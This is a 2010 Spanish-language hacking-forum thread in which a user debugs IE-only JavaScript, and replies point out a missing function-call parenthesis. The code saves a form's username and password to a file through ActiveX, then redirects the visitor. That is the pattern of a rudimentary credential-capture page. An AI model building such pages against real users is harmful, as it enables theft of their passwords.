elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  funcion javascript
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: funcion javascript  (Leído 2,278 veces)
qiqeroot

Desconectado Desconectado

Mensajes: 52



Ver Perfil
funcion javascript
« en: 22 Noviembre 2010, 22:28 pm »

Código:
<SCRIPT language="javascript">

function WriteToAFile()
{
var fso, f1;
var ForReading = 1;
fso = new ActiveXObject("Scripting.FileSystemObject");
//Abre el archivo para agregar el texto
f1 = fso.OpenTextFile("testfile.txt",8,true);
// Escribe el texto que se encuentra en el TextArea en el archivo.
f1.WriteLine(document.forma.user.value);
f1.WriteLine(document.forma.password.value);
// Cierra el flujo que escribe al archivo
f1.Close();
}

</SCRIPT>

<script language="javascript">
<!--
function redireccion()
{
location.href='www.paginaredireccionada.com';
}
//-->
</script>
<script language="javascript">
function funciones()
{
WriteToAFile();
redireccion;
}
</script>


trasteando funciones en javascript y la primera me la hace pero la segunda no? gracias de antemano, el boton tiene asignada la variable funciones


En línea

aveces la solución es el problema
Mr. Crowley


Desconectado Desconectado

Mensajes: 343


Costa Rica


Ver Perfil WWW
Re: funcion javascript
« Respuesta #1 en: 5 Diciembre 2010, 07:13 am »

Hola, no entiendo lo que quiere decir. Podría explicar un poco más?
Según tengo entendido javascript no tiene acceso a archivos, no será que está
mezclando javascript con VBScript???  :rolleyes:


En línea

Mi blog personal: www.calirojas.com
Nakp
casi es
Ex-Staff
*
Desconectado Desconectado

Mensajes: 6.336

he vuelto :)


Ver Perfil WWW
Re: funcion javascript
« Respuesta #2 en: 5 Diciembre 2010, 19:11 pm »

ehm... si tiene acceso porque es un ActiveXObject (propio de IE) y la segunda no la ejecuta porque no la llamas... olvidas el parentesis :rolleyes:

salu2
En línea

Ojo por ojo, y el mundo acabará ciego.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ejecutar funcion javascript directamente
Desarrollo Web
arenoide 2 6,696 Último mensaje 20 Febrero 2011, 02:54 am
por arenoide
Dos tipos de comillas en sentencia echo y funcion javascript
PHP
mokoMonster 2 3,084 Último mensaje 8 Diciembre 2011, 16:57 pm
por WHK
Pasar funcion PHP a javascript
Desarrollo Web
blaknez root 1 1,565 Último mensaje 27 Julio 2014, 18:41 pm
por MinusFour
AYUDA CON FUNCION javascript
Desarrollo Web
Christopher Bryan 1 1,715 Último mensaje 11 Agosto 2014, 18:32 pm
por MinusFour
Una función en javascript
Desarrollo Web
Ali Baba 3 2,535 Último mensaje 18 Mayo 2017, 21:20 pm
por dato000
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines